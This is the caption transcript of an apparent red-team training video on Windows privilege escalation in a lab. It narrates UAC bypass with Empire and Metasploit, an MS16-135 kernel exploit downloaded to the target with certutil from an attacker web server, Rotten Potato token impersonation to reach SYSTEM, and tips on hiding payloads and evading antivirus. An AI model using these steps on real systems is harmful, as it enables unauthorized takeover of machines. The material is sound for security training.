Windows Red Team Privilege Escalation Techniques - Bypassing UAC & Kernel Exploits

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everyone welcome back to the red team training Series in this video we are going to be taking a look at privilege escalation uh on windows so again we're focused on the privilege escalation tactic now and we are going to be again taking a look at various set techniques that you can utilize to elevate your privileges on Windows systems given that this series was targeted towards Windows system so in regards to what we will be covering exactly we'll start out by taking a look at the techniques the privilege escalation techniques that we will be exploring we'll then take a look at the at each individual techniques uh within the Practical section of this video so we'll start off by bypassing use Access Control to elevate our privileges we'll talk about kernel exploits and impersonation attacks and the reason why I'm covering these techniques as opposed to any others is primarily because these will provide you uh with the best uh with the best chance of actually elevating your privileges or these uh particular techniques uh have been known to work as opposed to fail based on you know various environments or based on tests that have been performed in various environments so again these are pretty much the ones that I think are very important to begin with before you start exploring the process of exploiting Windows services in order to elevate Privileges and I'll probably make a video covering that that being said let's explore these techniques a little bit in depth all right so when we talk about bypassing user access control uh this is the these are the descriptions that I got from the miter website and the reason I'm using them is just to have an accurate uh picture of what exactly these techniques entail so when we talk about bypassing use Access Control adversaries bypass UAC mechanisms to elevate processes or process privileges on a system all right so the user access control feature on Windows allows a program to elevate its privileges and of course this is facilitated by the tracking of processes and their integrity ranging from low to high in order to perform a task under a administrator level permissions possibly by prompting the user for confirmation so again as I as I said before when we actually covered the bypassing use access control with Empire I mentioned basically how it works and as I said before what we are trying to to do is essentially utilizing UAC mechanisms to elevate the process privileges on a system all right so when you talk about kernel exploits kernel exploits are is essentially when you identify vulnerabilities within the windows kernel for that particular Target and then of course you exploit those vulnerabilities in order to elevate your privileges right and of course the description gives you an idea of what's going on here so adversaries May exploit software vulnerabilities in an attempt to elevate privileges now the description from the miter website is also referring to applications or third-party solutions that may have vulnerabilities within them that could provide you with elevated privileges however in this case we are going to be focusing on kernel exploits primarily because again they will actually provide us with the best chance of actually elevating our privileges you then have token impersonation a token impersonation is a fairly simple technique to understand uh and I'll just go through the description really quickly so adversaries May duplicate then impersonate another user's token to elevate the Privileges and bypass access controls and adversary can create a new uh a new access token that duplicates an existing token using duplicate token uh the token thing can then be used to uh imp can then be actually utilized using the impersonate logged on user privilege to allow the calling thread to impersonate a logged on user security context all right so what's happening here is we're essentially finding uh impersonation or a delegation tokens that we can utilize and then impersonating them in order to obtain their privileges so for example if we find an anti-authority system token we can impersonate that token to obtain its permissions and of course its permissions again are essentially root or administrative privileges so again we're able to obtain uh you know administrative privileges we've been able to elevate our privileges right so these are the three techniques that we'll be looking at and of course you can take a look at the miter attack privilege escalation tactic on the website and you can see I've highlighted these techniques that we'll be covering so abusing elevation control mechanism access token manipulation exploit exploitation for privilege escalation etc etc and of course I will be covering uh additional techniques within this particular tactic in the future that being said let's take a look at our Target environment or the environment we'll be using to to essentially perform our privileged escalation techniques so we'll start off with a Windows 10 virtual machine or the Windows 10 Target Windows 7 and also Windows Server 2008 R2 so again the reason I'm doing this is to give you a feel for how various versions of Windows operate in regards to particular techniques and what techniques work best on each of them and again we'll we'll go through this dynamically all right so that's pretty much it in regards to the theoretical aspect of this video now that we have all of that out of the way let's actually get started with the Practical aspect of this video so I'll see you back on my Kali VM all right so I'm back on my Cali VM and the first technique that we're going to uh utilize is bypassing use access control and I'm again going to be doing this on my Windows 10 Target and I have already received a ping back from the Windows 10 Target on Empire this is Starkiller so you can see Windows 10 and again I can interact with it however if you note if you actually notice the uh our privileges we can see that this is a this is not a high integrity agent and that means that we don't have administrative privileges so that is going to be the goal and we'll do that by utilizing the bypass use access control module and we'll also replicate the techniques with Metasploit so that I can show you how it's done manually so again I've also retrieved a meterpreter session on the Windows 10 Target system so again if I just type in sysinfo you should be able to see that we are running on the Windows 10 system so I'm just going to wait for that to load there we are we can see Windows 10 and our objectives now is again to elevate our privileges to anti-authority system or to the administrative level right so that is going to be objective so we'll start off with star killer or Empire if you will so again as I mentioned before if you click on a an agent here and you can also do this through the Empire client if I click on view again you can try and enumerate whether this is a high integrity agent or not and I'll just do this through the Empire client here so again I'll just list out my agents here and I'll say interact and I'll specify windows 10. and if I display the info here you can see under high integrity the value is set to zero which means we don't have admin privileges here so the module that we are going to be using so I'll click on interact we'll be using a an Empire module and the module is going to be bypass UAC right and we're looking for the Powershell previous bypass UAC module so I'm going to click on that we need to provide a reverse listener so that we can actually get our our high integrity agent because it is going to execute and then we're going to get a new agent on the same Target with elevated privileges so I'll specify my listeners HTTP we'll just use that you can provide any obfuscation methods here based on the actual uh type of obfuscation you want to perform uh as as I've already mentioned before we've covered defensive Asian and again you can apply those same techniques but in this case it is already going to be assumed that you have access to the Target and you have evaded antiviruses or any the antivirus system in place that being said that's pretty much all that we need to provide here so I'm going to submit that and you can see it's going to say module execution queued for Windows 10. we can then click on the agent here and view the running tasks so I'm just going to load this here and let's see whether we'll actually get a callback or we'll actually get a high integrity agent that actually connects back alternatively you can also use the Empire client here in the terminal and again I'll just say agents and then I can say interact um Windows 10 and again I can also display the history of commands that we executed here so again I'm just going to wait for this to execute successfully all right so it looks like the module actually executed successfully and again we get back our high integrity agent and again I can hover over it and you can see that this is an elevated process so I can click on that and I'm just going to rename this to uh win10 win10 priv or we can just say um high integrity and again I'm just going to get rid of The Hyphen there win 10 high um again just to keep things nice and simple so that we actually have an understanding of what system we're dealing with you can see that that is now privileged and we've been able to successfully Elevate our privileges uh to the highest level with Empire now let's take a look at how to replicate the same uh privilege escalation technique using meterpreter or manually so again this will work if you have an interpreter session on the target which I'm guessing you do and the first thing again we want to do is just verify our privileges which you can see here are standard what I'll do now is I'll just put this in the background and I will I will then of course list out my sessions you can see the session ID is set to one here and again you can actually get information regarding this particular interpreter session here uh the first thing I want to do ideally is to actually migrate to this particular um this particular interpretive session or the process right rather so again I'll just list out the processes on the target system and I'll migrate this to explorer.exe so that's under PID 4040 you can see it there so I'm going to say migrate 4040 hit enter that's going to migrate me to a 64-bit interpreter session which is actually quite useful when running post exploitation modules with Metasploit you can see migration completed successfully I'm then going to say CIS info you can see we're running now on a 64-bit meterpreter session so I'm just going to put this in the background now and we want to search for bypass uh UAC and they're going to be multiple modules based on the uh the actual exploitation technique and the various Windows components that you're going to be targeting so in this particular case you can see that we have as I said multiple ones this particular a module will again it's just a standard Windows escalate UAC protection bypass you can also do it in memory which is what I recommend primarily because number one you'll evade any antiviruses if there are any antivirus systems in place and secondly you never ever want to interact with the windows service like for example The Event Viewer unless you know how to clean up your mess so we'll use the exploit Windows local bypass UAC injection win sxs as that works really well on Windows 10 systems so I'll use that module there and I'm going to set the the correct payload for the Target operating system architecture so I'll set the payload to Windows x64 meterpreter reverse TCP right and we can then also show the various options here you can see that the exploit Target is set to Windows x86 so I'm going to say Set uh Target um if I can set it here set Target to Windows x64 because the target is 64-bit operating system we then want to set the L host and the L port and the session in my case I'll leave the lhost and the L Port there I'll set the session uh to session one and then I just hit run and let's see whether we're able to again Elevate our privileges successfully all right so we get a majority session here and again we can type in get uid you can see we're still uh msh win10 IE user so we are currently the IE user which again is not privileged however we can actually check what privileges we have by typing in get privs so again I'll just type in get privs there hit enter and you can see we have the uh all the um the Privileges associated with an administrator account right and one of the key ones that we'll be exploring later is the SC impersonate privilege which again is used to impersonate uh access Windows access tokens so we'll actually take a look at that technique that being said you can actually see that we are we have been able to elevate our privileges successfully and this was how to elevate your privileges using uh or by bypassing use access control on windows 10. so let's move on to the next technique which will be again utilizing kernel exploits so I'll see you once I've set up the target system all right so the next technique we're going to be taking a look at is Kernel exploits right and our Target system is going to be a Windows 7 system you can check out the system information here I've already obtained an initial foothold on the target system and the first order of the day is to actually migrate our process into a 64-bit process so that we can obtain a 64-bit interpreter session so similarly we'll just uh print out the process three here and again we'll look for Explorer as it provides us with the best option in terms of a stable process to migrate to as the Explorer will never be forced to shut down or restart normally under normal use cases so we'll say migrate and then explorer.exe is 1864 that's the process ID so one eight six four hit enter we're going to migrate to that process and then of course I'll try and print out the system information and let's see whether that's that is successful so CIS info and you can see we're around 64-bit meter Bridge session all right now this particular technique is going to I'm going to handle it in a manual way again we're not going to be using Empire primarily because we can't perform kernel exploitation with Empire we can only do it uh using a manual command shell and we're going to be we're not going to be using any tools or utilities that we will be transferring over to the Target system apart from the kernel exploit itself so the first part of privilege escalation is to perform local enumeration of the target system and of course in the context of Kernel exploitation the information that's important to us is the operating system version the build number the service pack and the architecture as well as the updates or hotfixes that have been installed on the target system so if I just spawn up a shell session here and let's see if we actually get a shell session there we are so I'm just going to type in system info and this is a native Windows command I'll hit enter uh this command will display all relevant information pertinent to this particular operating system or the Target right and if we get take a look from the beginning of the results we can see that it's Windows 7 Ultimate uh the OS version is 7601 Service Pack 1 build 7601 uh the other information that is useful in this case is going to be the hotfixes installed and it's going to provide you with the hotfix IDS that again will either tell you what exploits a kernel exploits will work or what kernel exploits won't work based on what has been patched and what hasn't been patched so the process of identifying kernel exploits can be done manually or automatically through the use of a tool called um Windows exploit suggestor and again the link to this GitHub repository will be in the description of this video or in the documentation of this video and all you need to do is clone the repository and it's a python script and the way it works is fairly simple it's a tool that you run on your Cali VM not on the target so you can see it's a python script that you ex that you actually execute and it is a python 2 script so again it's a vital that you install all the dependencies right over here as you can see and it does come with a requirements file or you can essentially install the dependencies manually by following the um the instructions here and again the first thing you need to do is just run the tool to obtain an initial database a vulnerability database and what this database is is essentially a list of all windows exploits or vulnerabilities and again the next piece of information that you need to obtain is this information right here so you actually need to copy out the output of the system info command from the target system so I'll just copy it right over here and you need to paste it into a file so I'm just going to open up my text editor I'm then going to paste this into a file and I'll save it on my desktop here and and I'll just call it let's see we'll just call it Windows 7 Windows 7.txt right and I'll hit save and there we are that's going to save it and now we can run the tool on Kelly the Sim simple um or Windows X play suggested rather let me just stop serving that and I'll just head over onto my desktop where I've cloned the repository so this is under Windows enum and Linux sorry Windows exploit suggestor there we are that's the tool and you can see we have the script here all right so now in terms of running the tool as I said we need to run the tool with python and then provide the database file that you can get by running the update command and then you provide the system info information that you just copied and pasted into a txt file and then you hit enter and it's going to utilize the system information file and cross check with the vulnerability database to identify any potential vulnerabilities that we can exploit and in our case we're looking for kernel vulnerabilities that will Elevate our privileges right so we will run this and I'm just going to run it here so we'll say windows exploit suggested I already have my database and it's quite up to date and then I'm going to specify my database option so I'll say database database and then I specify the file so it's uh there's the database file and then we have to provide the system info command and then we provide the system the file containing the actual system information we we just copied over in our case it is on my desktop and it is called Windows 7.txt we're going to hit enter and we want to give that a few seconds to generate or to display all the vulnerabilities that affect this particular version of Windows and I just want to highlight one thing is that when you have this the output of this particular tool is color coded in that when you have a green output that means that again it's going it's a it's a positive result for a vulnerability and again in this case the vulnerability is outputted in terms of the vulnerability code the windows or Microsoft vulnerability code there it also provides you with exploit links to the exploit code and a reference link that will actually tell you more about what this particular exploit does or what it's exploiting particularly right so let's try and identify one here that again will provide us with privileges or will actually Elevate our privileges right and right over here I can identify one that that again looks quite interesting and might be able to help us you can see security update for secondary logon to address elevation of privilege and it provides us with exploit code and it looks like there are a few uh there are few versions of the exploit code based on the target operating system so we can see that we have Windows 7 to 10 and Server 2008 to 2012 both architectures 32-bit and 64-bit but let's see if we can find any more information regarding this particular vulnerability all right so let's actually see what we can find um so what we can do is just copy that particular vulnerability code here and we can use Google or some Google docs um so I'll just open up Google here there we are and we'll just paste that in there and then we'll limit the output to exploitdb or to only show results from exploitdb.com and again we can see what this particular exploit does so we'll click on the first link here as that's putting into our version of Windows um so let's see what it does you can see that this is the partial implementation of ms16032 the exploit targets all vulnerable operating systems that support Powershell version 2 and again the way it works you can see that it requires two or more CPUs to work and you can learn more about this particular exploit by clicking on the reference link and this write-up was done by the Google project zero security team so I'll just open that up and let's see what this particular exploit pertains to or what it's actually exploiting so it it looks like it's exploiting the second logon handle and it says right over here once in a while you'll find a bug that allows you to leak a handle opened in a privileged process into a lower privileged process I've just I found just such a bug in the secondary logon service on Windows which was fixed this month as ms-16032 the bug allows you to leak a thread handle with full access all right so that gives you a bit of a description you can go through the entire write-up as to how that is done we can also take a look at a few other exploits that were that were actually displayed here and again through my usage of this Tool uh the best options or the best exploits that again have the highest chance of success are going to be the ones at the top here so for example ms16 135 uh actually looks like this is a security update for Windows kernel mode drivers and this is a kernel exploit as opposed to this particular one here let me just open that up so this particular exploit isn't a kernel exploit this is essentially exploiting the secondary logon handle so again what we can do is I'm just going to reopen that Tab and we'll head back over to Google and let's see whether we can gather more information regarding this vulnerability as it directly targets the kernel and you can see this particular exploit code uh provides us or uh performs privileges collation or will provide us with elevated privileges right so what we can do is go back and I'm just going to remove that particular Explorer or vulnerability code there and let's see what this this one pertains to so we can again see that it provides us with the source or a reference link the binary link these are going to be the compiled binaries and a mirror to that particular executable that we can utilize and again we can also learn more about what's happening here but let's actually try out this particular exploit so when it comes down to downloading exploits I recommend utilizing exploitdb and of course I also recommend compiling the code yourself into a a an executable or a binary instead of downloading pre-built binaries the reason I'm saying this is because pre-built binaries may have malicious code unless they're coming from a trusted Source like offensive security right over here now I also want to make one thing clear whenever you're targeting the windows kernel you're essentially playing around or mucking about with the core of the Windows operating system and of course the windows kernel is Windows NT that means that if you make a mistake or there's an issue with your code then you execute you your exploit code you may actually cause the operating system to crash right which can cause data loss again it can raise certain alarms so on and so forth so you have to be really careful about what you're executing in the Target and you should again perform research on the Kernel exploits that you're utilizing now in this case I've already used this before and I know that it doesn't cause any issues and I'm familiar with the source code of compiled the binaries many times so I can almost guarantee that if you run this particular exploit on a Windows 7 Target you'll not have any issues in regards to stability of the target system right so what we're going to do is if we go back into Cali here and you can see that it provides us with the exploit code so we can actually download the code from exploitdb or the pre-built binary as it were and we can then transfer it over to the Target but before we do that we also need to learn about how this works right so what I'll do is we can just take a step back here and we can just open that up in a new tab and we'll say ms16 135 exploit right and let's see whether we get any links all right so it looks like we get a link to a GitHub repository here and if we click on the actual uh the actual exploit of vulnerability code there you can see that it provides us with pre-built binary um that's going to be the executable here and the C code that you can actually compile yourself right so I will be covering how to compile Windows exploits in the future this is beyond the scope of this video but you also have the partial scripts so it looks like this will work on all 64-bit vulnerable targets uh you can execute it with Powershell or you can also use the executable and the way you utilize this exploit and I'll just show you how it works is you need to run the target executable on the Target or the exploit uh binary on the Target and then provide the version of Windows that you're trying to exploit so if it's Windows 7 you exploit it and provide the seven option if it's 10 so on and so forth so it's fairly simple to understand so we can actually download this from the GitHub repository or we can utilize the official Source here which is again going to be from offensive security exploitdb but in our case uh we'll just download it from here as I know that this is a trusted source so I'll just click on it here we can then say download and I will save it in my downloads directory and now what I will do is I'm just going to move it from my downloads directory or we can actually leave it within the downloads directory I'll just change my directory into the downloads folder and we can see it there so I can now we now need to transfer it over to the Target now given that we're utilizing manual techniques uh there are two ways we can go about doing this one of them is by uploading it using meterpreter so if I head back over into my interpreter session I can utilize the upload functionality and then specify the exploit that I want to upload in the directory that I want to upload it in and then execute it that way alternatively I can also utilize the cert util utility to transfer files so I'll actually take you through both I'll take you through the manual process however there is one thing that we're missing out remember we currently are an unprivileged user right so if I say you know get user ID here you can see that we're currently the user where our user name is simply called user so we need to again if I list out my current working directory we're in the system 32 directory so we need to head back over to the root of the C drive and then users there we are user us and will then hit enter and then CD user and we can then save the files here as this particular user will have the necessary privileges to save files to this particular user directory so we will save them in our downloads folder of course whenever you're transferring exploit code onto the target you want to do this in a folder that is not frequently accessed by users on the target system and so that your payloads are not detected another way of of actually going about doing this is by going to the root of the C drive and taking a look at the temp directory so the temp directory again is where you can store all your temporary files and again it's a folder that's not frequently accessed by by users on a Target system so I'll just head over into the temp directory and we can now transfer the exploit over onto the target now in order to transfer it over to the exploit or to the Target we need to set up a web server that will host that exploit code for us and we can do that on Kelly using the simple HTTP server module that's a python module that again allows us to set up an HTTP server in the directory that we're currently working in so in this case when the downloads directory and you can see it has the exploit here we'll just rename the exploit to something that's more identifiable we'll just call it exploits.exe now again I don't recommend doing that or giving applications names like exploits as that can again raise alarms so I'll just move it in this case we'll just doing it so that we can easily identify so I'll say sudo python M simple HTTP server and we'll run this on Port 80. so this is going to set up our web server within the downloads directory and then on the target system we can open up a shell session and I will then we are currently within the temp directory so if we list out the contents of the temp directory I have the shell that I was utilizing or that actually utilize to gain access here so again what I can do let me just head over into interpreter let me just remove shell.exe let me just make sure that that is out of there and I'll then open up a shell here and uh there we are list the contents there we don't have anything so now we'll utilize that util to download uh the file from our Cali web server so we'll say set util and then we'll say URL cache and then we'll specify that we want to download it from the following IP address this is going to be your Cali IP and the name of the file is exploit.exe we then need to provide the output a file name which is going to be just exploit.exe hit enter it's going to download that from the target let's see whether the file is there we can see we have exploit.exe so now we can try and run the code so I'm just going to say exploit.exe and you can see that it provides you with instructions as to how to run this particular kernel exploit and in our case our Target is running Windows 7 so we simply need to run the executable and provide the option seven as it says here so we will do that we'll do exactly that so I'm going to say exploit.exe and seven and again given the fact that I have experience with this particular exploit this exploit will take a few seconds to work so again you want to give it probably around 10 to 30 seconds so I'm just going to hit enter and again just give it a few seconds to execute all right so once it executes successfully we can then again enumerate our permissions by simply typing in uh who am I so if I type in who am I you can see anti-authority system and we've successfully been able to elevate our privileges so I can head back into my interpreter session and if I say CIS info uh and I say you know get use ID you can see it's still going to say where the current user but we have anti-authority privileges there and yeah we've been able to successfully Elevate our privileges through a kernel exploit on a Windows 7 Target system so that is how to perform manual kernel exploitation or how to utilize a kernel exploits manually as I said I've not utilized any Metasploit modules there are modules that exist that can be utilized to exploit the kernel however as I said I'm not going to be covering that because it's essential to know how to transfer exploits manually over to the Target system how to exp how to execute them and of course verify that we have elevated our privileges so that's going to be it in regards to using kernel exploits to elevate your privileges the next technique we're going to be taking a look at is token impersonation so I'll see you when I have the target set up all right so we are now going to be taking a look at uh token impersonation and uh we again we're going to be focusing on the process of utilizing impersonation attacks in order to elevate our privileges right now I'm going to be using a Windows 7 system however under different parameters and you'll understand why in a few seconds so you can see it's a Windows 7 Target build 7601 Service Pack 1 and we're using a different user called Windows 7 right and uh let me just give you a brief explanation of what token uh impersonation attacks entail in relation to privileged escalation right so token impersonation attacks leverage specific Windows privileges such as the SE impersonate privilege in order to obtain an access token with administrative privileges that we can then impersonate in order to elevate our privileges so if that's a bit confusing let me explain what Windows privileges I'm referring to so for example if I type in get privs and of course this going to get the Privileges for this particular user you can see that it'll list out all the windows privileges Associated to this user and these privileges essentially classify or identify what this user can do and if you take a look at a very interesting privilege here called SE impersonate privilege that is the privilege that we're going to try and exploit in order to impersonate an access token that of course has administrative privileges in this case we're going to try and impersonate the anti-authority system access token now the question is how exactly do we get those impersonation tokens that's the the key thing here that you need to take away from all of this right now there are multiple techniques that we'll be utilizing and this will depend on the version of Windows you are targeting and in this case we'll be taking a look at potato attacks more specifically the rotten potato attack however I'm just going to give you a basic overview of how this works before I do that however if we take a look at um if we take a look at the vulnerabilities that we were able to enumerate for the Windows 7 Target and let me just try and identify the actual vulnerability that I was talking about or that I actually want to highlight here that has to do with a particular potato attack hopefully I can find it here so it's not too difficult um let's see let's see we're looking for the potato attack right there it is I think I can actually see it now so there we are that's ms-16 075 security update for Windows SMB server right and you can see it actually provides a description so this is Hot Potato Windows privilege escalation and you can learn more by actually utilizing this particular write-up and it's a very good write-up it actually explains what's going on right and it is quite a sophisticated attack in the sense that in order to obtain the privileged uh or the uh yeah the privileged access token there needs to be a few things done so you can see that the potato attack works by taking advantage of known issues in um in Windows to gain local privilege escalation in default configurations namely utilizing the ntlm relay specifically the HTTP SMB relay and nbns proofing so again just to simplify what's going on here what we're trying to do is we're trying to exploit their vulnerability with within windows and we're getting a process and in this case let me just see if I can find that step because that's very important here um there we are so the fake wpad proxy server in Windows Internet Explorer by default will automatically try to detect Network proxy setting configuration by accessing the following URL this also surprisingly applies to some windows services such as Windows update right and the URL does not exist on the fake proxy server that will set up or that this exploit sets up so what will happen is with nbns spoofing we can Target our nbns spoofer at localhost we can then flood the target machine with our own nbns response packets and essentially get the privileged access token to uh to actually be sent to our fake um to all fake wpad proxy server here right so what's happening is fairly simple we're essentially intercepting uh the um the privileged access token and again once we obtain it we can then utilize it uh to impersonate that particular access token so that's uh the a very simplistic explanation of what what is going on here if you want to learn more about this I'll probably make a video that explains each step of what's going on and as I said it's a fairly complicated exploitation process but luckily for us uh windows or interpreter actually has or Metasploit rather actually has a pre-built module that allows us to exploit this very um this very vulnerability right and obtain our impersonation uh token right or retrieve our privileged access token that we can impersonate so we will also be utilizing a module that's inbuilt into an interpreter called Incognito so if I say load Incognito and then I I list the tokens right here for all the users you can see that we currently have delegation tokens that we can utilize like the anti-authority system token here but that is from a previous exploitation that I had performed but I'll still take you through the process of retrieving the um this particular access token because right now we can essentially impersonate that token by typing in impersonate token and then providing the token that we want to impersonate but I'll take you through the process of running the module first so I'll just put this in the background and we can then search for ms16 075 right we hit enter and we have the module for that particular vulnerability and it's going to exploit it so you can see Windows net ntlmv2 reflection and we just copy it and I'm gonna paste it in there and we need to set the correct payload so payload uh windows x64 meterpreter reverse TCP right and we show the options here we need to set uh the session so let me just list out my sessions here so set session two there we are and I'll leave the lhost and the airport options as are because I don't need to actually change the L Port here because I don't have anything running so I'll just hit run and let's see all right so it's going to run the exploit and it's going to give us a new interpretive session if I say get uid now you can see it's still going to say win 7 PC win 7 and if I say get cribs it's going to give us the same privileges that we had before if I open up a shell session and I say who am I it's the same thing so you might be asking yourself well that didn't work what's going on here why don't I have uh administrative privileges well that's because what this exploit does is actually provides us with the impersonation token so if I now say list tokens um sorry uh we haven't loaded Incognito here but let me just say load Incognito and then list tokens you can now see that we'll have the NT Authority system token here that we can impersonate right so again this is a delegation token but we can use it the same way uh so I'll say impersonate token and I'll paste that in there and that way it's going to say successfully impersonated user token and if I say get uid we now have NT Authority system privileges here and we've been able to successfully Elevate our privileges now as I said this exploit can be performed manually by of course taking a look at potato attacks more specifically rotten potato so for example I'll just search for it here uh rotten potato and I'll click on the first link here this is the best vector or exploit that you can actually utilize so you can see local privilege escalation from Windows service accounts to system so the usage for the usage for this exploit is simple you compile it you get a metabolous shell on the target system you load Incognito you run the binary and then you impersonate empty Authority system right so again they already have the pre-built binary here and I think I can actually take you through the process by utilizing a non-privileged session but again you do require the SE impersonate privilege otherwise you will not be able to impersonate any access tokens that you are able to retrieve so let me just explain a little bit about rotten potato attacks because they are slightly different and of course this is going to be much much more manual if we take a look at um I already have the exploit code I believe on my on my Kali VM you can actually take a look at the source and compile it yourself but we'll be utilizing the pre-built binaries here and we need to transfer it onto the Target and then what we need to do is essentially run it and we should be able to retrieve a system access token or anti-authority system access token and then impersonate it so what I'll do is let me just um put this in the background right and we'll head over into our unprivileged session so sessions two right and what's my current working directory I'll head over into the uh the C drive and we'll head over into temp uh right and within here we add the earlier kernel exploit that we utilized uh no problem there if I check out my um let me just clear that out if I head over into my desktop uh Windows exploits and within this here we should have the potato folder here we are and we have the rotten potato exe so I'll again utilize uh the simple HTTP server so simple HTTP server and I'll Host this on Port 80. and now we can transfer it using cert util so I'll just open up shell here and we'll say set util URL cache and then we specify the Kali IP here 192 168.2.21 and this is rotten uh potato dot exe right and we'll save it as potato.exe just to keep the name shorter and will it enter and we'll wait for that to transfer and it looks like it transferred successfully so now in terms of running the exploit all you need to do is simply run potato dot EXE we hit enter give that a few seconds it's going to start the relay and it's going to say uh it again it's going to start the relay and then it's going to receive the challenge the ntlm authentication Challenge and with that ntlm authentication challenge you get the access token and then it's going to say right over here got type 3 message auth token relay you are now system decom connection uh terminated and let's see whether we actually got anything here so I'm just going to wait for it to complete uh and let's see whether we were able to get anti-authority system privileges all right so it completed running and now if I list out the tokens uh you can see that again it'll still display the same things but we have the anti-authority system token here and we can then impersonate it uh so again I'll just say impersonate there we are let's see if it successfully is able to impersonate the as uh impersonally the use entity Authority system there we are if we type in a shell and who am I and the authority system and that is how to perform uh potato attacks manually and automatically using a Metasploit module and of course we've been able to elevate our privileges successfully so that is uh in general how to again perform token impersonation attacks on Windows um so that's pretty much all that I wanted to cover in this video as I've mentioned in the uh in within the slides there are many other techniques that you can utilize but these are the techniques that are the most stable across board and again you will have to change your approach based on the version of window you're targeting as I said with Windows 10 it's very difficult to actually find vulnerabilities that again can allow you to to obtain access tokens like this but it's not impossible and you can try out the other techniques listed out under the privilege escalation tactic on the miter attack website that being said that's going to be it for this video and I'll be seeing you in the next video

Info

Channel: HackerSploit

Views: 22,269

Rating: undefined out of 5

Keywords: hackersploit, hacker exploit, hacking, kali linux, windows bypass uac, windows 10 bypass uac, bypass uac windows 10 without admin rights, bypass uac windows 10, windows kernel exploitation, red team, red teaming, what is a red team, red team exploitation, red team initial access, powershell empire, powershell, empire, powershell empire tutorial, shellter kali linux, av evasion, av evasion 2022, shellter, powershell obfuscation, windows red team, red team windows

Id: vPTbWnCZ0sg

Channel Id: undefined

Length: 45min 25sec (2725 seconds)

Published: Tue Dec 27 2022